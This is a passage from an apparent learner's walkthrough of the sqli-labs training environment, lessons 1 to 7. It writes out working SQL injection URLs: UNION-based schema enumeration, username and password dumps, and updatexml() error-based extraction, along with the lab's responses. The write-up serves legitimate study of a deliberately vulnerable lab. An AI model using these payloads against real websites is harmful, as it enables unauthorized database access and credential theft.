Finished creating.Enter the sqli-labs directory and check the configuration file (db-creds.inc[main file]).Only review it; do not make any changes.
1
# cd /var/www/html/sql-connections
Return to the web brower and click the Setup/reset Database for labs button to install.
So far,the environment setup is complete.
Process(Learning & Record)
Less-1
Test to enumerate the column names via SQL injection.
Extract all user data via SQL injection.0x3a replace ;.
Less-2
Test
1 2 3
http://192.168.44.142:8081/Less-2/ ?id=2' and 1=1 --+ Error tips:*You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' -- LIMIT 0,1' at line 1*
Test to retrieve the database name via SQL injection.
1 2
http://192.168.44.142:8081/Less-2/ ?id=20 union select 1,2,group_concat(schema_name) from information_schema.schemata --+
Extract all user data via SQL injection.0x3a replace ;.
1 2 3 4 5
http://192.168.44.142:8081/Less-2/ ?id=20 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() --+
http://192.168.44.142:8081/Less-2/ ?id=20 union select 1,2,group_concat(username,0x3a,password) from users --+
Less-3
Test
1 2 3 4 5 6 7 8 9 10 11
http://192.168.44.142:8081/Less-3/ ?id=-1' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''-1'') LIMIT 0,1' at line 1
http://192.168.44.142:8081/Less-3/ ?id=-1' --+ You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
http://192.168.44.142:8081/Less-3/ ?id=-1') order by 4 --+ Unknown column '4' in 'order clause'
Test to retrieve the database name via SQL injection.
1 2
http://192.168.44.142:8081/Less-3/ ?id=-1') union select 1,2,group_concat(schema_name) from information_schema.schemata --+
Extract all user data via SQL injection.
1 2 3 4 5
http://192.168.44.142:8081/Less-3/ ?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() --+
http://192.168.44.142:8081/Less-3/ ?id=-1') union select 1,2,group_concat(username,0x3a,password) from users --+
Less-4
Test
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
http://192.168.44.142:8081/Less-4/ ?id=1' --+ Welcome Dhakkan Your Login name:Dumb Your Password:Dumb
http://192.168.44.142:8081/Less-4/ ?id=1" --+ You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
http://192.168.44.142:8081/Less-4/ ?id=1") and 1=1 --+ Welcome Dhakkan Your Login name:Dumb Your Password:Dumb
http://192.168.44.142:8081/Less-4/ ?id=1") and 1=2 --+ Welcome Dhakkan
You will discover the difference between and 1=1 and and 1=2.
Test to retrieve the database name via SQL injection.
1 2 3 4 5
http://192.168.44.142:8081/Less-4/ ?id=0") union select 1,2,group_concat(schema_name) from information_schema.schemata --+ Welcome Dhakkan Your Login name:2 Your Password:information_schema,challenges,mysql,performance_schema,security
Extract all user data via SQL injection.
1 2 3 4 5
http://192.168.44.142:8081/Less-4/ ?id=0") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() --+
http://192.168.44.142:8081/Less-4/ ?id=0") union select 1,2,group_concat(username,0x3a,password) from users --+
Less-5
Test
1 2 3 4 5 6 7 8
http://192.168.44.142:8081/Less-5/ ?id=1' --+ Welcome Dhakkan You are in...........
http://192.168.44.142:8081/Less-5/ ?id=1' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
Find the enjection point.It’s an error enjection category.Try to use the updatexml() function to exploit it.
1 2 3 4
http://192.168.44.142:8081/Less-5/ ?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(username,0x3a,password) from users),1,31),0x7e),1) --+ Welcome Dhakkan XPATH syntax error: '~Dumb:Dumb,Angelina:I-kill-you,D'
Only 31 characters can be displayed due to the updateXML() function’s limit.So bro,u know.Modify the parameters in the statement — change 1 and 31 to 32 and 64.
1 2 3 4
http://192.168.44.142:8081/Less-5/ ?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(username,0x3a,password) from users),32,63),0x7e),1) --+ Welcome Dhakkan XPATH syntax error: '~ummy:p@ssword,secure:crappy,stu'
Less-6
Test
1 2 3 4 5 6 7 8
http://192.168.44.142:8081/Less-6/ ?id=1 Welcome Dhakkan You are in...........
http://192.168.44.142:8081/Less-6/ ?id=1" You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"" LIMIT 0,1' at line 1
We will find that it only modifies basics of Less-5
1 2 3 4
http://192.168.44.142:8081/Less-6/ ?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(username,0x3a,password) from users),1,32),0x7e),1) --+ Welcome Dhakkan XPATH syntax error: '~Dumb:Dumb,Angelina:I-kill-you,D'
Then,Without further elaboration.
Less-7
It’s diffcuilt.This level mainly tests blind SQL injection.I tried various approaches, including Burp Suite, but they were too cumbersome. Finally, I decided to use sqlmap to perform blind injection.